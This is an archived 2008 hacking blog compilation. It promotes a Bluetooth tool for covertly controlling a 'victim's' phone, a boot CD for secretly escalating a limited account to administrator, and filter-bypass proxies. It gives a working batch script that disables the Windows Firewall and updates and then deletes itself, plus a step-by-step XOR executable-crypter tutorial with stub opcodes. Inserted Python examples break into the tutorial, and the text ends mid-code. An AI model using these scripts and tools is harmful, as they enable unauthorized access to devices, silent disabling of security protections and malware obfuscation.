Thursday, July 17, 2008

Download Updated Windows PowerShell 1.0 for XP SP3

Microsoft has updated Windows PowerShell 1.0 for Windows XP and Windows Server 2003 and made new English-language installation packages available for download as of June 23, 2008.




Designed to integrate with Windows Server 2003 SP1, SP2 and R2 (x86, x64 and Itanium-based) along with Windows XP SP2 (both the 32-bit and 64-bit editions) and SP3 (32-bit only), the updated release of Windows PowerShell 1.0 does not target Microsoft's latest Windows client. Windows Vista SP1 is left out; the latest variant of Windows PowerShell for Vista has been available since January 30, 2007, the day that Microsoft also made Vista RTM available.

"Windows PowerShell is a new command-line shell and scripting language designed for system administration and automation. Built on the .NET Framework, Windows PowerShell enables IT professionals and developers to control and automate the administration of Windows and applications," Microsoft states in the product's description. "Windows PowerShell includes more than 130 command-line tools (called 'cmdlets') for performing common system administration tasks, such as managing services, processes, event logs, certificates, the registry, and using Windows Management Instrumentation (WMI)."

Users should bear in mind that the downloads contain only the English-language installation packages for Windows XP and Windows Server 2003, not any localized versions or the multilingual packs. Microsoft is currently hard at work on the successor to Windows PowerShell 1.0, namely version 2.0, which has only reached the stage of the second Community Technology Preview so far. At the bottom of this article, you will also find an embedded video containing PowerShell tips and tricks, courtesy of Ben Pearce, a Premier Field Engineer.

Download: Windows PowerShell 1.0 for XP (link 1)

Tools to Automate RapidShare Downloading for Free Users With No CAPTCHA


RapidShare's CAPTCHA has always been hacked, no matter how tough they made it. Usually, whenever RapidShare updated its CAPTCHA, it only took a few days for third-party download tools to recognize it automatically. One of the toughest CAPTCHAs was the one with cats and dogs in it, and it took 3-4 weeks to be cracked. A few days after the cats-and-dogs CAPTCHA was cracked, RapidShare installed a new CAPTCHA system called TEABAG_3D.




TEABAG_3D is developed by the OCR Research Team, who are a bunch of CAPTCHA hackers themselves. They claim that after defeating several CAPTCHAs, they decided to make a CAPTCHA that is hard to break. I've been in communication with the developers of CryptLoad and jDownloader to keep track of their progress in defeating the latest 3D CAPTCHA on RapidShare. They were about 50% of the way there when RapidShare suddenly decided to eliminate the CAPTCHAs to simplify the use of RapidShare's free services significantly, but with a catch: the download speed has been limited to 500 kilobits per second, which is only 62.5 KBps.

1. CryptLoad

- The interface is in English and configuration is not complicated. Other than downloading from RapidShare, it also supports downloading from many other one-click hosters such as Megaupload, Gigasize, Depositfiles, etc. Currently CryptLoad can only run on Windows with the Microsoft .NET Framework; the next major update, version 2, should support Mac OS and Linux as well. Supports automatic updates.
[ Download CryptLoad ]

2. JDownloader
- This tool has not been mentioned here before, but I can tell you now that this is a really good downloading tool for one-click-hoster websites. JDownloader is open source, platform independent and written completely in Java. It simplifies downloading files from one-click hosters like Rapidshare.com or Megaupload.com, not only for users with a premium account but also for users who don't pay. It offers downloading in multiple parallel streams, CAPTCHA recognition, automatic file extraction and much more. Of course, JDownloader is absolutely free of charge. Additionally, many "link encryption" sites are supported, so you just paste the "encrypted" links and JD does the rest. Because it is written in Java, you can run JDownloader on Windows, Mac OS and Linux. Supports automatic updates. Try it and you'll love it!

[ Download jDownloader ]

3. CandiSoft Load!
- Load! also has not been mentioned on this blog before. The interface is in German, but it shouldn't be too hard to understand as some words are pretty similar to English. You can always make use of Google Translate to help you translate from German to English. Runs on Windows and supports automatic updates. It also supports other one-click hosters such as Megaupload, netload.in, uploaded.to, etc.
[ Download CandiSoft Load! ]


4. RS Downloader
- This tool has been mentioned on this blog before, and the interface is in German. It runs on Windows, supports automatic updates and can only download from RapidShare. It can also automatically recognize and decrypt encrypted RapidShare links using the YouCrypt plugin.
[ Download RS Downloader ]

5. Universal Share Downloader (USDownloader)
- USDownloader is another popular and powerful one-click-hoster download manager. It supports a lot of free hosting services, including the most popular ones like RapidShare, MegaUpload or YouSendIt. You can select from 26 languages for the program's interface, and it runs on Windows. When you want to update USDownloader, you'll have to use the server http://usd.cap-cap.ru/ because the one in the list doesn't work.
[ Download USDownloader ]

source: raymond.cc

How To Change a Windows XP Limited User Account Into an Admin acc

PCLoginNow is an easy-to-use tool to reset local administrator and other account passwords on Windows systems. No need to reinstall the system. It resets Windows passwords and Windows security settings instantly. All versions of Windows are completely supported. It's an incredible CD for home users and businesses. And most of all, it's the most popular and safe solution for removing your Windows password to date.

Besides the ability to reset passwords, PCLoginNow can also help you maintain and change account policy settings and properties. You can easily upgrade a general account to administrator level, or lock or unlock those accounts you don't need anymore. Moreover, all of this is done without booting your tedious, time-consuming Windows system.

The most powerful feature PCLoginNow has is its support for Syskey. SYSKEY is an optional feature since Windows NT 4.0 SP3. It is meant to protect against offline password cracking attacks so that the SAM database would still be secure even if someone had a copy of it. Even though the system registry is protected by Syskey, PCLoginNow can easily bypass this mechanism and reset the Windows passwords.

Only 4 simple steps are required to turn a limited user account into administrator.
1. Download PCLoginNow.

2. Burn the ISO image to a CD/DVD.

3. Boot up the computer with the CD/DVD.

4. Click the Next button when you see the message that says “PC Login Now! is ready to start, please click NEXT to continue…”

5. Select the Windows system that is found by PC Login Now program.

6. Select the user account that you want to edit, check “is Administrator” and click Next.
(screenshot: Change Limited User account to Administrator)

7. Reboot and the user is now a local administrator of the computer.

I find this tool amazing because it can turn a user from zero into hero. I understand that some students are adventurous and would like to install or configure the system the way they like it, but they cannot do it with a limited user account. Hence, they find a way to secretly upgrade their limited account to a local computer administrator, and now they can do whatever they want. We cannot set a BIOS password because if the students enter the wrong password 3 times, it'll be locked and we'll have to contact HP support to get them to reset it.

Use Gmail as a drive in Windows

Google increased the storage limit for Gmail users just recently who have now roughly four Gigabytes at their disposal with the option to add even more storage that can be purchased in the account settings. The maximum amount is currently 400 Gigabytes of storage which would cost $500 per year.
Most users will probably be happy with the four Gigabytes and can use a small piece of software called GMail Drive to add the Gmail storage as a drive in Windows. To do that, the user needs to install GMail Drive and enter his login details when clicking on the new drive letter. I suggest saving this information unless you want to enter the username and password every time you want to access the drive.
I mainly use it to back up important data, not as my primary backup location but as a secondary one. All files that are stored on the drive are accessible on the Gmail website as well, which means it is also possible to store files that you work with on different computers.
Read More:
Gmail Drive

how to Set up your own proxy server

Lots of people complain that web proxies are not working on their work or school computers because they have been banned by administrators. A way around this would be to set up your very own proxy server that is hosted a) by a free web hosting service that supports either PHP or CGI, or b) on your own website that is hosted by a web hosting company.
Both methods should work, and I will walk you right through the installation process for both scripts and give you tips on how to find out what is actually being blocked. Before we start you need to download a copy of phpproxy or cgiproxy, depending on what you want and can use. You could also perform a search for free web hosting on Google, for instance, and try to find a web hoster that supports one of the two languages; a good site that I found while searching for those terms is freewebspace.net.

1. phpproxy
Download phpproxy and unpack it to a local directory on your hard drive. All you need to do now is upload the script to your webspace and open up the new URL to check if it's working all right. You might want to rename the file to something different, something that does not contain the word proxy in it, to avoid filters that ban everything that has the word "proxy" in it.
You could open up the script and enter your client's IP in there to make sure that only your client will be able to connect, or you could add a .htaccess file to the directory forcing everyone who wants to start the script to enter a username and password. Again, use Google if you'd like to find out more information about .htaccess.
The PHP script has some requirements; make sure you read the readme file which is included and check to see if your hoster has those requirements enabled.
2. cgiproxy
Your hoster has to have CGI enabled in order to run this script. Many free hosters do not offer CGI, or offer only some preinstalled scripts. Make sure it is enabled before you start the installation process.
First, download the source and unpack it to a local directory.
Now, open the .cgi file and take a look at the configuration. You can edit lots of settings from within; for example, you could configure the script so that it only allows text to go through the proxy but no images. Everything is explained in detail and all options are explained with comments; browse through the file, edit the options to your liking and save the new file.
After that, upload the script to your cgi directory if that is required by your hoster and open the URL from your browser. You are now ready to browse the web anonymously. To check if that is really the case, load a website like whatismyip.com as the first site and check if the IP matches the server the script is installed on and not your computer's IP. If that is the case you've done everything right and can surf anonymously. (There are still ways to find out your IP, just in case you are wondering.)
3. What is being blocked ?
a) If you can access the proxy from the client, they only block domains / IPs.
b) If you can't access the proxy, they might be banning filenames that contain "proxy" as well; try changing the filename.

Wednesday, July 16, 2008

Super Bluetooth Hack 2008

This is a new version of Super Bluetooth Hack for conventional and Symbian-based mobiles. Through MDM, this program can be used to control other people's mobile phones at a distance (10-15 metres).


Super Bluetooth hack New 2008
More in New Version :
1) Connect via BT/Irda
2) Reading SMS
3) Changing time/alarms
4) Pressing keys…
What else can you do once connected to another phone via Bluetooth?
1) Read SMS matches.
2) Turn off telephone.
3) Switch on music.
4) Choose modes (normal, without sound …)
5) Block Phone.
6) Read his Contacts
7) Change Profile
8) Play his Ringtone even if the phone is on silent
9) Restore Factory Settings.
10) Restart the phone
11) Change Ringing Volume
And here comes the best
“Call from his phone” it includes all call functions like hold etc.
And much, much more


Install:
1) Download
2) Copy it onto the mobile
3) Run the installer (what you download incidentally needs Java)
4) It finds it, and you will be able to run the software
5) Choose the language and get it configured
6) Click Connection
7) Click search devices
8) Choose the "victim"
9) AND MANAGE
Download Super Bluetooth hack New 2008

Sunday, July 13, 2008

Which Browser Is More Secure

Some new statistics just came out regarding Browser Security, this is more in terms of which users are most likely to apply patches and be using the most secure version.
I would have thought Firefox would have been pretty high since the newer series prompt automatically new patches. My only guess is a lot of people are still using 1.5x series which didn’t have that feature.
It turns out that Internet Explorer is the 'most secure'. Well, that's very subjective, as IE doesn't show sub-versions like the other browsers do, and Windows Update pushes out patches quite aggressively. It also depends which set of data you look at, as the two conflict: one says Firefox users are more secure and one says IE.
The researchers who published a large study of web browser security this week had a great idea and excellent data to work with. Too bad they overreached with their conclusions. A lot more is being made of this paper than is warranted.
The researchers, from ETH Zurich, Google, and IBM, looked at log data provided by Google from their global user base for web search and applications for the period between January 2007 and June 2008. This data was based on the browser user-agent string, which is also the reason the data is not as telling as the authors argue.
What did the study conclude? First, lots of users are not running the most up-to-date and secure versions of their web browsers. Second, that this is primarily a phenomenon of Internet Explorer users; Firefox users, on the other hand, overwhelmingly update their browsers quickly. These and other results lead the authors to suggest that browsers get expiration dates, much like milk and pharmaceuticals.
As expected though a LOT of users are not running the latest version of their browser, but that doesn’t surprise us really does it?
I think the versioning is an issue though, with IE you only get to know about the major version (IE5, IE6, IE7, IE8) and not which actual patches they have applied.
Why, one might ask, does Microsoft not provide minor version information? Microsoft’s David LeBlanc answers that question in his blog by saying that they consider such information to be an “information disclosure vulnerability.” In other words, by giving a web-based attacker precise version information, you are also giving them better information on how to attack that browser.
In these measurements IE7 users are much more likely to be up to date than other browser users. The authors are correct that Secunia users are more likely to be security-aware, but even when they try to adjust the numbers, multiplying the IE7 number by 2.1 “… to correct for the bias of Secunia’s measurement within a security aware user population” IE7 still ends up looking better.
There is actually a discrepancy between the two sets of data; the metrics are odd, though, and are based on heavy assumptions (IE7 is secure but IE6 is not, while IE7 is a MORE secure browser architecture- and feature-wise, a fully patched IE6 can also be perfectly secure).
I’d be interested to see more of these stats and see the full Google access logs for a few month period.
That would be some interesting data mining.
Source: eWeek

Saturday, July 12, 2008

Batch File To Disable Firewall - Windows XP SP2

@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\firewall.reg" ECHO REGEDIT4
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\firewall.reg"
DEL "%Temp%.\firewall.reg"
DEL %0



Shuts down the Windows Firewall and disables Automatic Updates from the next reboot on.

And no, Microsoft is not going to fix this. This code will work when it goes live.



Wednesday, July 9, 2008

Build your own executable crypter

This article will take you through the basic steps of building an executable crypter. All of the steps performed in this article require manual setup and integration to prepare the exe for the crypter stub. The focus of this article is to walk you through the theory and know-how of how crypters work and does not attempt to create the latest greatest point and click solution.

For a basic background, here is how executable crypters work:

1) The actual processor commands of a protected binary are crypted/obscured/munged, whatever.

2) When the protected application first starts, a small decrypter stub is run first that restores all of the original processor commands for the executable in memory.

3) Finally, the decrypter stub ends and transfers execution to the original entry point (OEP), and the program runs normally.

In the course of this paper, we are going to manually implement a very simple 'crypter' to show you all of the development techniques, design considerations, and debugging details required to make your own.

First, let me introduce you to our target executable. It is a 28kb hello world application written in C. This simple application merely prints "Hello World" to the screen, waits for a keypress and then exits.

To get us started, let's examine the PE structure of the executable file. Below is an image of the PE section table. You will notice that the .text section (where the actual executable code is housed) has a raw size of 4000h and a virtual size of 3DCEh.

The discrepancy between the numbers indicates that at the end of the .text section there is a certain amount of unused space not currently mapped into memory when the file is loaded. This blank spot in the executable file is good because it means we have an empty pad where we can place our own executable code.

To visually verify this you can open up the file in a hex editor and look for a null pad. To know where to look you have to be able to find the right file offset. In our sample exe this is simplified because all of our sections have a virtual size <= their raw size and each section's raw offset = its virtual offset.

This is nice because it keeps all of the RVA values in the PE header = raw file offsets; however, this is not always the case. V.2 of the PE editor classes now takes this into account and can calculate file offsets from RVA values correctly. The assumption of RVA = file offset will be made throughout the remainder of this article because it holds true for this particular sample we are analyzing.

So... to see this null pad, open up the original exe file in a hex editor and check out the area between 4DCEh and 5000h (from RawOffset + VirtualSize up to RawOffset + RawSize):

Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F

00004DC0 C0 74 06 0F B6 45 0B C9 C3 83 C8 FF C9 C3 00 00 Àt..E.ÉÃÈÿÉÃ..
00004DD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004DE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004DF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

For our needs this will be more than enough space to place our simple decrypter stub. We do not necessarily need to squeeze our code into an existing section. Had we been short on space, we could have resorted to adding a new PE section and placing our code there.

Ok, we have found a home for our decrypter block, but first we have to make some adjustments to the PE section characteristics so that:

A) our decrypter code gets loaded into memory
B) once mapped into memory, we have write access to the main body of code
C) when the program is first loaded, execution begins with our decrypter code

As noted above, the virtual size of the section (the size loaded into memory) does not include this null pad we found in the file. Since we are going to be adding code to this area, we need to make sure that this area is loaded into memory as well. This is accomplished by increasing the virtual size of this PE section using a PE editor such as LordPE.

The second change is to make sure that the .text section is flagged as writable once mapped into memory. This is necessary because our decrypter stub needs to dynamically rewrite (decode) the actual processor codes to be executed. This too is easily done in LordPE from the "edit section header" dialog. Below is a graphic of the dialog sequence and field manipulations required in LordPE. Highlighted in yellow are the fields that we have altered.

Our next goal is to make sure that when the executable first loads, it is our decrypter stub that runs first. Since the real processor commands for the executable will not be present on disk, having the program start at the original entry point would have the machine trying to execute what is essentially a jumbled block of data.

The program entry point can be edited directly from LordPE's main interface. For our demonstration let's set the entry point at 4E00h. This offset sits 32 bytes past the end of our real application's code and gives us a nice easy spot to find in the hex editor.
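The header edits described above (a .text section made writable as well as executable, and an entry point moved into the slack at the tail of the section) are also what an analyst can look for statically. The following Python script is an added example, not part of the original article or its VB tooling: it parses a PE section table and entry point and flags those indicators. The header-only sample images are constructed inline, and the tail threshold and the bumped virtual size of 0x4000 are assumptions.

```python
import struct

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000


def parse_sections(data):
    """Return (AddressOfEntryPoint, [section dicts]) read from a PE image's headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", data, coff + 2)
    opt_size, = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    entry_rva, = struct.unpack_from("<I", data, opt + 16)   # same offset in PE32 and PE32+
    sections = []
    for n in range(num_sections):
        off = opt + opt_size + 40 * n
        name, vsize, vaddr, rsize, raddr = struct.unpack_from("<8sIIII", data, off)
        chars, = struct.unpack_from("<I", data, off + 36)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize, "virtual_address": vaddr,
            "raw_size": rsize, "raw_address": raddr, "characteristics": chars,
        })
    return entry_rva, sections


def audit_pe(data, tail_fraction=0.9):
    """Flag the header tricks the article relies on. tail_fraction is an assumed
    heuristic: an entry point in the last 10% of its section is worth a look."""
    entry_rva, sections = parse_sections(data)
    findings = []
    wx = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    for s in sections:
        if s["characteristics"] & wx == wx:
            findings.append(f"{s['name']}: section is both writable and executable")
    home = next((s for s in sections
                 if s["virtual_address"] <= entry_rva < s["virtual_address"] + s["virtual_size"]),
                None)
    if home is None:
        findings.append(f"entry point {entry_rva:#x} lies outside every section's virtual range")
    else:
        if not home["characteristics"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"entry point {entry_rva:#x} is in non-executable section {home['name']}")
        pos = entry_rva - home["virtual_address"]
        if pos >= tail_fraction * home["virtual_size"]:
            findings.append(f"entry point {entry_rva:#x} sits in the tail of {home['name']} "
                            f"(offset {pos:#x} of {home['virtual_size']:#x})")
    return findings


def build_image(entry_rva, text_vsize, text_chars):
    """Constructed header-only PE32 image (not a real binary) with one .text section
    laid out like the article's sample: RVA 1000h, raw offset 1000h, raw size 4000h."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                   # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                     # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                 # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x1000)          # SectionAlignment, FileAlignment
    text = struct.pack("<8sIIIIIIHHI", b".text", text_vsize, 0x1000, 0x4000, 0x1000,
                       0, 0, 0, 0, text_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text


# The untouched hello-world: EP 1048h, .text virtual size 3DCEh, read + execute.
ORIGINAL = build_image(0x1048, 0x3DCE,
                       IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
# After the article's edits: EP moved to 4E00h, .text made writable, virtual size
# raised to cover the stub (0x4000 is assumed; the article only says it was increased).
CRYPTED = build_image(0x4E00, 0x4000,
                      IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE |
                      IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)

if __name__ == "__main__":
    for label, img in (("original", ORIGINAL), ("crypted", CRYPTED)):
        print(label, audit_pe(img) or ["no findings"])
```

Run against a real file with `audit_pe(open(path, "rb").read())`; a W+X code section or an entry point in a section's tail is a reason to inspect, not proof of packing.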

With the PE structure modifications out of the way, now we can move on to the actual work. Here is what we have left:

D) build the decrypter stub
E) crypt the actual executable's opcodes
F) integrate our decrypter stub into the modified binary

Let's start with some design visions for our encoding mechanism. Since this is a demo and a trainer, the encoding mechanism is going to be kept as lightweight and simple as possible. For these reasons a simple XOR encoding will be used.

The next design consideration is to enumerate what kind of variables a generic crypter stub is going to need. Basically any crypter stub is going to need three things:

1) what offset (in memory) to start decrypt data
2) length of the data to decrypt
3) entry point to transfer execution to after decrypted

Since we are designing a really simple stub, I am going to take a shortcut and start the encryption routine right at the program's original entry point. While the EP is not at the very beginning of the code section, it is usually close enough that the majority of processor commands will be encrypted.

Before we get into the actual design and development of our decrypter stub, let's knock off the easy part of XORing the original opcodes first. This is a simple operation, and can be done in whatever way is most convenient for the developer. The implementation I chose was to create a quick VB program that loops through the binary, applying the XOR to the appropriate bytes representing the application's opcodes.

For a quick refresher:

Q) How do I know where the opcodes begin?
A) For our simple setup we are starting at the original program entry point found in the PE header.

Q) How do I know how long a block to encode?
A) Since we want to encode all of the opcodes after the entry point, the length of the data to encrypt is Original Virtual Size - Entry Point.

Inline below is the VB source code used to encode the executable's opcodes:

Dim f As Integer, i As Long, offset As Long
Dim b As Byte
Dim StartAt As Long, length As Long
Dim p2 As String

p2 = "final.exe"      ' path to the target exe (file name assumed; Olly later shows the module as "final")
StartAt = &H1048      ' original entry point (RVA = raw file offset for this sample)
length = &H2D86       ' 3DCE - 1048 (virtual size - entry point)

f = FreeFile
Open p2 For Binary As f

For i = 1 To length
    offset = StartAt + i   ' Get/Put positions are 1-based, so this covers file offsets 1048h..3DCDh
    Get f, offset, b       ' read one original opcode byte
    b = b Xor &HF          ' apply the XOR key the decrypter stub will undo
    Put f, offset, b       ' write the encoded byte back in place
Next

Close f


With that out of the way, we are now down to developing our decrypter stub. Basically what we need is a small block of ASM commands that we can paste into the encoded binary at our new entry point.

Below is the decoder block I came up with written in C:

/* Built with Visual C++ (uses MSVC inline _asm). It is compiled only to harvest
   its opcodes; the hard-coded addresses only make sense inside the target binary. */
void main(void){

    int i;
    char b;

    char *buffer = (char *)0x400000 ; // imagebase
    long length = 0xBEEF ;            // <- length of code (placeholder)

    buffer += 0xDEAD ;                // <- OEP offset (placeholder)

    for(i=0; i < length; i++){

        b = buffer[i] ;               // fetch an encoded byte
        b = b ^ 0xF ;                 // undo the XOR applied by the VB encoder
        buffer[i] = b ;               // write the decoded opcode back in place

    }

    _asm jmp buffer                   // transfer control to the original entry point

}

Let me mention a couple points and design considerations about the above code.

* To make the stub generic you are going to have to edit the length and entry point offsets each time you use it. Make these recognizable values in hex to make them easier to find in the hex editor.

* buffer initially points to the imagebase; remember you are going to be working on memory addresses. The reason I increment buffer later to the entry point offset is because I will have to edit this value independently in a hex editor.

* To transfer execution to the original entry point we just use an inline asm command, jmp buffer. At this point buffer is already pointing directly to the program's original entry point.

All in all it is a very simple decoder stub. The trick comes in debugging and implementing it. Since the decoder is designed to work on data and offsets not found in this standalone application, we can really only use the compiler to generate the opcodes for the commands we need. Debugging takes place by integrating the actual stub byte codes into our crypted exe and running that through the debugger.

Now that we have our proposed C source, we need the assembler byte codes associated with it. The easiest way I have found to get the asm byte codes from the compiler is to set a break point at the top of the code and start up the VC debugger by pressing F5.

Once VC has compiled the code, it will then launch the built in debugger which pauses execution at your preset breakpoint. Now you can right click on the main window and choose "goto disassembly" to see a mixed assortment of C and ASM commands.

Below is a stripped down ASM block generated by the compiler for us. On the left are the actual byte codes associated with the string assembler commands on the right.

C7 45 F4 00 00 40 00 mov dword ptr [ebp-0Ch],400000h
C7 45 F0 EF BE 00 00 mov dword ptr [ebp-10h],0BEEFh
8B 45 F4 mov eax,dword ptr [ebp-0Ch]
05 AD DE 00 00 add eax,0DEADh
89 45 F4 mov dword ptr [ebp-0Ch],eax
C7 45 FC 00 00 00 00 mov dword ptr [ebp-4],0
EB 09 jmp main+43h
8B 4D FC mov ecx,dword ptr [ebp-4]
83 C1 01 add ecx,1
89 4D FC mov dword ptr [ebp-4],ecx
8B 55 FC mov edx,dword ptr [ebp-4]
3B 55 F0 cmp edx,dword ptr [ebp-10h]
7D 22 jge main+6Dh
8B 45 F4 mov eax,dword ptr [ebp-0Ch]
03 45 FC add eax,dword ptr [ebp-4]
8A 08 mov cl,byte ptr [eax]
88 4D F8 mov byte ptr [ebp-8],cl
0F BE 55 F8 movsx edx,byte ptr [ebp-8]
83 F2 0F xor edx,0Fh
88 55 F8 mov byte ptr [ebp-8],dl
8B 45 F4 mov eax,dword ptr [ebp-0Ch]
03 45 FC add eax,dword ptr [ebp-4]
8A 4D F8 mov cl,byte ptr [ebp-8]
88 08 mov byte ptr [eax],cl
EB CD jmp main+3Ah
FF 65 F4 jmp dword ptr [ebp-0Ch]

In order to insert this into our executable, we must further strip out just the byte codes and write the hex values into our executable file. A nice way to do this is to strip out the assembler commands, remove all of the spaces, and place them in a long string such as this:

C745F400004000C745F0EFBE00008B45F405ADDE00008945F4C745FC
00000000EB098B4DFC83C101894DFC8B55FC3B55F07D228B45F40345
FC8A08884DF80FBE55F883F20F8855F88B45F40345FC8A4DF88808EB
CDFF65F4

From here, you can copy the text string and write the associated hex values directly into the binary using the WinHex hex editor by highlighting the start offset (4E00h), pressing Ctrl-B (write clipboard) and then choosing the "ASCII Hex" clipboard format.

Once that is done, all we have left is to edit the data length and start offset placeholders compiled into the stub, and it will be configured for this binary. If you wrote the stub in starting at offset 4E00h, you will find the BEEFh data length marker at offset 4E0Ah and the DEADh entry point marker at offset 4E12h.

Note that both of these values are in little endian format. When you go to modify them with the actual values, remember to also write the new values in little endian format.

Below are hexeditor views of the modifications made.

Offset 0 1 2 3
00004E10 .. .. AD DE (DEAD)
00004E10 .. .. 48 10 (1048)

Offset 0 1 2 3 4 5 6 7 8 9 A B
00004E00 .. .. .. .. .. .. .. .. .. .. EF BE (BEEF)
00004E00 .. .. .. .. .. .. .. .. .. .. 86 2D (2D86)

With our decrypter block in place, our main code crypted, and the entry point now aimed at the decrypter, everything should be set and ready to run !

Open it up in Olly, give it a shot and see what happens. Before you start stepping through code, look around the original entry point and see what the disassembly looks like.

004010DC 12 DB 12
004010DD 05 DB 05
004010DE 0F DB 0F
004010DF 0F DB 0F
004010E0 AE DB AE
004010E1 53 DB 53
004010E2 63 DB 63
004010E3 4F DB 4F
004010E4 0F DB 0F
004010E5 AC DB AC
004010E6 6F DB 6F
004010E7 63 DB 63
004010E8 4F DB 4F

Yup, that's a garbled mess characteristic of a data block or encrypted opcodes... Now go back to the end of the decrypter block and set a breakpoint on the final "jmp buffer" command:

00404E55 >^FF65 F4 JMP DWORD PTR SS:[EBP-C] ; final.00401048

After reaching this point, scroll back up again and take another look at the original entry point 401048. If you still see a junk block of commands such as the above mess, it is because Olly has not yet analyzed the new byte values for processor commands. To fix this, right click in the main disassembly window and choose 'analyze code'. Now you should see the actual decoded instructions:

00401048 /. 55 PUSH EBP
00401049 |. 8BEC MOV EBP,ESP
0040104B |. 6A FF PUSH -1
0040104D |. 68 B8504000 PUSH final.004050B8
00401052 |. 68 9C244000 PUSH final.0040249C ; SE handler installation
00401057 |. 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]
0040105D |. 50 PUSH EAX
0040105E |. 64:8925 000000>MOV DWORD PTR FS:[0],ESP
00401065 |. 83EC 10 SUB ESP,10

Now you can hit the run button and voila! It should all function just as expected!

Looks like everything is in place and running just as it should be.

Note that using C to generate the Opcodes can make the decoder a bit bloated. If you wanted to write your decoder directly in asm you could use a stub similar to the following: (even this could be optimized further)

00404E3A B8 48104000 MOV EAX,401048 ;start offset
00404E3F B9 862D0000 MOV ECX,2D86 ;length
00404E44 8BD0 MOV EDX,EAX ;copy of start offset (OEP)
00404E46 8030 0F XOR BYTE PTR DS:[EAX],0F ;top_of_loop decode inst
00404E49 40 INC EAX ;next byte
00404E4A 49 DEC ECX ;dec counter
00404E4B ^75 F9 JNZ SHORT 00404E46 ;counter !=0 goto top_of_loop
00404E4D FFE2 JMP EDX ;jmp OEP

As one last little nugget, let me throw out a quick tip you can use to restore a crypted exe such as this to its former state.

Let's assume the decrypter stub did some actual encryption that we do not want to try to reverse engineer. If the crypter stub only operated on an uncompressed data block that was fully present in the exe and did not perform any other tricks or manipulations, restoring the executable can actually be very simple.

Give this a shot: load the exe in Olly and break on the last "jmp buffer". Here the actual executable code is fully decrypted in memory and ready to be run. Now fire up LordPE and dump the 401000 - 405000 memory address range to grab the full .text section from memory. You now have all of the decrypted opcodes saved to disk.

Write down the address of the original entry point that the jmp command was going to take you to and exit Olly. Open up the memory dump and the crypted exe in WinHex and write the entire dump of the .text section over the crypted .text section in the executable.

Save it, then change the entry point back to the original you wrote down and give it a click. Tadaahhh magic.....kinda..well not really...but you know. *shrugs*
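As an added example (not part of the original tutorial or its VB utility), here is the decoder loop and the restoration tip modelled in Python on a constructed byte image. The key (0x0F), start address (0x401048), length (0x2D86) and stub address (0x404E3A) are the ones from the asm listing above; the .text layout (virtual address 0x401000, file offset 0x1000, 0x4000 bytes) is an assumption. The stub bytes and the PE header are not modelled, only the region the stub decodes and the entry-point swap.

```python
# Added example, not part of the original tutorial: a Python model of the XOR
# decoder stub above and of the "dump and overwrite" restoration tip. The file
# image, section offsets and .text size are constructed; the key (0x0F),
# start (0x401048), length (0x2D86) and stub address mirror the asm listing.

KEY = 0x0F                 # XOR key used by the stub
OEP = 0x401048             # original entry point, first crypted byte
CRYPTED_LEN = 0x2D86       # number of bytes the stub decodes
STUB_VA = 0x404E3A         # address of the decoder stub (from the listing above)

TEXT_VA = 0x401000         # constructed: virtual address of the .text section
TEXT_FILE_OFFSET = 0x1000  # constructed: file offset of the .text section
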